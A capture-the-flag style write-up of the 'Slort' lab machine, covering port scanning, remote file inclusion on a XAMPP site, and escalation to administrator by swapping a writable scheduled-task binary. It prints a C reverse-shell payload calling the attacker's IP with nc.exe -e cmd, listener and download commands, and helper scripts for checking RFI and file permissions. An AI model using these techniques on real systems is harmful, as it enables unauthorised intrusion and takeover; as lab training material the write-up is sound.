
Slort

Machine Information

  • Machine Name: Slort
  • Machine Difficulty: Intermediate

Information Gathering

Classic nmap time

Nmap scan report for 192.168.221.53                                                                                   
Host is up, received user-set (0.018s latency).                                                                       
Scanned at 2024-10-08 20:16:08 +08 for 569s                                                                           
Not shown: 65520 closed tcp ports (reset)                                                                             
PORT      STATE SERVICE       REASON          VERSION                                                                 
21/tcp    open  ftp           syn-ack ttl 125 FileZilla ftpd 0.9.41 beta   
| ftp-syst:                                                
|_  SYST: UNIX emulated by FileZilla         
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC                                                   
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn                                           
445/tcp   open  microsoft-ds? syn-ack ttl 125                                                                         
3306/tcp  open  mysql?        syn-ack ttl 125              
| fingerprint-strings:                                                                                                
|   LSCP, NULL:                                                                                                       
|_    Host '192.168.251.221' is not allowed to connect to this MariaDB server                                         
| mysql-info:                                         
|_  MySQL Error: Host '192.168.251.221' is not allowed to connect to this MariaDB server                              
4443/tcp  open  http          syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)                  
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6                                                  
| http-methods:                                                                                                       
|_  Supported Methods: GET HEAD POST OPTIONS          
| http-title: Welcome to XAMPP               
|_Requested resource was http://192.168.221.53:4443/dashboard/                                      
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
5040/tcp  open  unknown       syn-ack ttl 125                                                                         
7680/tcp  open  pando-pub?    syn-ack ttl 125                                                                         
8080/tcp  open  http          syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)                  
|_http-open-proxy: Proxy might be redirecting requests     
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD                                                 
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6                                                  
| http-methods:                                                                                                       
|_  Supported Methods: GET HEAD POST OPTIONS                                                                          
| http-title: Welcome to XAMPP                                                                                        
|_Requested resource was http://192.168.221.53:8080/dashboard/                                                        
49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC                                                   
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC                                                   
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC                                                                                                                                                                         
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

Let’s just start with port 8080 ~

Port 8080

Let’s just go through the website and see what’s available.

After looking around, there is nothing interesting on the site itself, but directory brute forcing turns up something useful.

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://192.168.221.53:8080/FUZZ          
                                                                                                                      
        /'___\  /'___\           /'___\                                                                               
       /\ \__/ /\ \__/  __  __  /\ \__/                                                                               
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\                                                                              
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/                                                                              
         \ \_\   \ \_\  \ \____/  \ \_\                                                                               
          \/_/    \/_/   \/___/    \/_/                                                                               
                                                                                                                      
       v2.1.0-dev                                                                                                     
________________________________________________                                                                      
                                                                                                                      
 :: Method           : GET                                                                                            
 :: URL              : http://192.168.221.53:8080/FUZZ                                                                
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                             
 :: Follow redirects : false                                                                                          
 :: Calibration      : false                                                                                                                                                                                                                
 :: Timeout          : 10                                                                                             
 :: Threads          : 40                                                                                             
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500             
________________________________________________                                                                      
                                                                                                                                                                                                                                            
...
site                    [Status: 301, Size: 346, Words: 22, Lines: 10, Duration: 18ms]  
...

The site directory stands out as suspicious.

Exploring it, I noticed that the page is loaded through a ?page=main.php parameter. A file name passed straight to a PHP include like this is a candidate for both LFI and RFI.

I tried some LFI payloads, but the include seems to be constrained by include_path. With no better idea, I looked into RFI first. For RFI to work, allow_url_include must be On (and allow_url_fopen with it). XAMPP's dashboard links to a phpinfo page where this can be checked.

Alright, allow_url_include is On, so there is a high chance that RFI works. Time to set up a simple HTTP server with Python and test it.

It works: the included file is executed, which gives RCE. Time to get a reverse shell from here. I upload nc.exe and run it to connect back to my listener.

rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.164] from (UNKNOWN) [192.168.221.53] 50203
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\site>whoami
whoami
slort\rupert
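The phpinfo check from the RFI step, written up as a small script. This is an added example and not code from the original post: it parses the directive table that phpinfo() renders, decides whether an include() of user input can fetch a remote URL, reports the settings that usually explain failed LFI attempts, and builds the test URL. The phpinfo fragment is constructed for the example and the attacker file name is an assumption.

```python
import re
from html import unescape

# Constructed phpinfo() fragment in the table layout PHP emits
# (Directive | Local Value | Master Value). The values are assumptions
# for this example, not copied from the target.
SAMPLE_PHPINFO = """
<table>
<tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
<tr><td class="e">allow_url_fopen</td><td class="v">On</td><td class="v">On</td></tr>
<tr><td class="e">allow_url_include</td><td class="v">On</td><td class="v">On</td></tr>
<tr><td class="e">include_path</td><td class="v">\\xampp\\php\\PEAR</td><td class="v">\\xampp\\php\\PEAR</td></tr>
<tr><td class="e">open_basedir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
</table>
"""

ROW_RE = re.compile(
    r'<tr><td class="e">(.*?)</td><td class="v">(.*?)</td><td class="v">(.*?)</td></tr>',
    re.S,
)


def _text(cell):
    """Strip tags (e.g. <i>no value</i>) and entities from a table cell."""
    return unescape(re.sub(r"<[^>]+>", "", cell)).strip()


def parse_phpinfo_directives(html):
    """Map directive name -> (local value, master value)."""
    return {_text(n): (_text(l), _text(m)) for n, l, m in ROW_RE.findall(html)}


def rfi_possible(directives):
    """include($_GET['page']) with an http:// URL needs BOTH allow_url_fopen
    and allow_url_include set to On. The local value is the one that applies."""
    def on(name):
        return directives.get(name, ("", ""))[0].lower() == "on"
    return on("allow_url_fopen") and on("allow_url_include")


def lfi_restrictions(directives):
    """Settings worth reading when local include attempts keep failing."""
    return {
        "open_basedir": directives.get("open_basedir", ("no value", ""))[0],
        "include_path": directives.get("include_path", ("", ""))[0],
    }


def rfi_url(target, param, attacker_file):
    """Build the test URL. Serve the payload with a non-.php name: if the
    attacker host ran a PHP-enabled server it would execute the file
    instead of handing the target its source."""
    if attacker_file.lower().endswith(".php"):
        raise ValueError("serve the payload as .txt, not .php")
    return f"{target}?{param}={attacker_file}"


if __name__ == "__main__":
    d = parse_phpinfo_directives(SAMPLE_PHPINFO)
    print("RFI possible:", rfi_possible(d))
    print(lfi_restrictions(d))
    print(rfi_url("http://192.168.221.53:8080/site/", "page",
                  "http://192.168.45.164:8000/shell.txt"))
```

Feed it the saved HTML of the dashboard's phpinfo page instead of SAMPLE_PHPINFO; if rfi_possible() is False, the remaining option is LFI within whatever open_basedir and include_path allow.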

Time for privilege escalation to a higher-privileged user.

Privilege Escalation

Always run winPEAS so you don't miss useful information. Here a plain dir of C:\ already shows something worth a look.

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6E11-8C59

 Directory of C:\

07/20/2020  07:08 AM    <DIR>          Backup
10/08/2024  05:54 AM             2,693 output.txt
12/07/2019  02:14 AM    <DIR>          PerfLogs
05/04/2022  01:06 AM    <DIR>          Program Files
12/03/2021  09:22 AM    <DIR>          Program Files (x86)
12/03/2021  09:29 AM    <DIR>          Users
05/04/2022  01:52 AM    <DIR>          Windows
06/12/2020  08:11 AM    <DIR>          xampp
               1 File(s)          2,693 bytes
               7 Dir(s)  28,588,576,768 bytes free

There is a suspicious Backup directory in C:\. Let's look inside and go through each file.

C:\Backup>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6E11-8C59

 Directory of C:\Backup

07/20/2020  07:08 AM    <DIR>          .
07/20/2020  07:08 AM    <DIR>          ..
06/12/2020  07:45 AM            11,304 backup.txt
06/12/2020  07:45 AM                73 info.txt
06/23/2020  07:49 PM            73,802 TFTP.EXE
               3 File(s)         85,179 bytes
               2 Dir(s)  28,588,474,368 bytes free

C:\Backup>type info.txt
type info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt

This looks like a scheduled task that runs C:\Backup\TFTP.EXE every 5 minutes. If the task is visible to this user, schtasks /query /fo LIST /v shows which account it runs as. Now let's see if I can modify the file.

C:\Backup>icacls TFTP.EXE
icacls TFTP.EXE
TFTP.EXE BUILTIN\Users:(I)(F)
         BUILTIN\Administrators:(I)(F)
         NT AUTHORITY\SYSTEM:(I)(F)
         NT AUTHORITY\Authenticated Users:(I)(M)

Successfully processed 1 files; Failed processing 0 files
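Reading icacls output by eye works for one file, but the same question (can a low-privileged principal replace this binary?) comes up for every scheduled task and service path. The following is an added example, not part of the original post: it parses icacls output into ACEs and flags entries that grant write-capable rights to Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE, or the current user. The sample input is the icacls output shown above, and the handling of the first line assumes the file name contains no spaces.

```python
import re

# Constructed sample: the icacls output for C:\Backup\TFTP.EXE shown above.
SAMPLE_ICACLS = """TFTP.EXE BUILTIN\\Users:(I)(F)
         BUILTIN\\Administrators:(I)(F)
         NT AUTHORITY\\SYSTEM:(I)(F)
         NT AUTHORITY\\Authenticated Users:(I)(M)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals every unprivileged session holds.
LOW_PRIV = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# Rights that let you overwrite or swap the file: full, modify, write,
# write data, append data, delete.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D"}
# Inheritance flags icacls prints in the same parentheses; not rights.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}

ACE_RE = re.compile(r"^(.*?):((?:\([^)]*\))+)$")


def parse_icacls(text):
    """Return [(principal, rights)] for each ACE. The first output line
    starts with the file name; continuation lines are indented.
    Assumption for this example: the file name has no spaces."""
    aces = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("Successfully"):
            continue
        line = raw
        if not raw[0].isspace():
            parts = raw.split(None, 1)  # "<file> <principal>:<rights>"
            line = parts[1] if len(parts) > 1 else ""
        m = ACE_RE.match(line.strip())
        if not m:
            continue
        principal = m.group(1).strip()
        groups = re.findall(r"\(([^)]*)\)", m.group(2))
        rights = {r.strip() for g in groups for r in g.split(",")} - INHERIT_FLAGS
        aces.append((principal, rights))
    return aces


def writable_by_low_priv(text, current_user=None):
    """[(principal, [write rights])] for ACEs an unprivileged user benefits from."""
    interesting = set(LOW_PRIV)
    if current_user:
        interesting.add(current_user.lower())
    hits = []
    for principal, rights in parse_icacls(text):
        usable = rights & WRITE_RIGHTS
        if principal.lower() in interesting and usable:
            hits.append((principal, sorted(usable)))
    return hits


if __name__ == "__main__":
    for principal, rights in writable_by_low_priv(SAMPLE_ICACLS, current_user="slort\\rupert"):
        print(f"replaceable via {principal}: {','.join(rights)}")
```

Run it over `icacls <path>` output collected for each task or service binary; an empty result means the file itself is safe, though the containing directory still needs the same check because Delete plus write access to the directory is enough to swap the file.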

Based on the result, I can modify the file: BUILTIN\Users has Full control and Authenticated Users has Modify. Time to create a malicious exe and swap it in.

#include <stdlib.h>

/* Replacement for C:\Backup\TFTP.EXE: when the scheduled task runs it,
 * start the nc.exe already uploaded to the web root and hand a cmd.exe
 * to the attacker listener on 192.168.45.164:1235. */
int main(void)
{
    /* system() blocks until nc.exe exits, i.e. until the shell is closed. */
    system("C:\\xampp\\htdocs\\site\\nc.exe 192.168.45.164 1235 -e cmd");
    return 0;
}

This C program simply spawns the reverse shell. I cross-compile it on Linux, upload it to the victim, and replace TFTP.EXE with it (keeping the original as a backup).

x86_64-w64-mingw32-gcc a.c -o test.exe
C:\Backup>curl 192.168.45.164:8000/test.exe -O
curl 192.168.45.164:8000/test.exe -O
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  110k  100  110k    0     0   110k      0  0:00:01 --:--:--  0:00:01 1177k

C:\Backup>move TFTP.EXE TFTP.EXE.BAK
move TFTP.EXE TFTP.EXE.BAK
        1 file(s) moved.

C:\Backup>move test.exe TFTP.EXE
move test.exe TFTP.EXE
        1 file(s) moved.

With the binary in place, start a netcat listener on port 1235 and wait for the scheduled task to fire.

rlwrap nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.45.164] from (UNKNOWN) [192.168.221.53] 50356
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
slort\administrator

That’s how I get administrator shell ~

Things I learned from this machine

  • Make sure to check phpinfo for useful settings, especially allow_url_include when RFI is suspected
  • Always look into unusual directories when it comes to privilege escalation
This post is licensed under CC BY 4.0 by the author.

Author: Hepet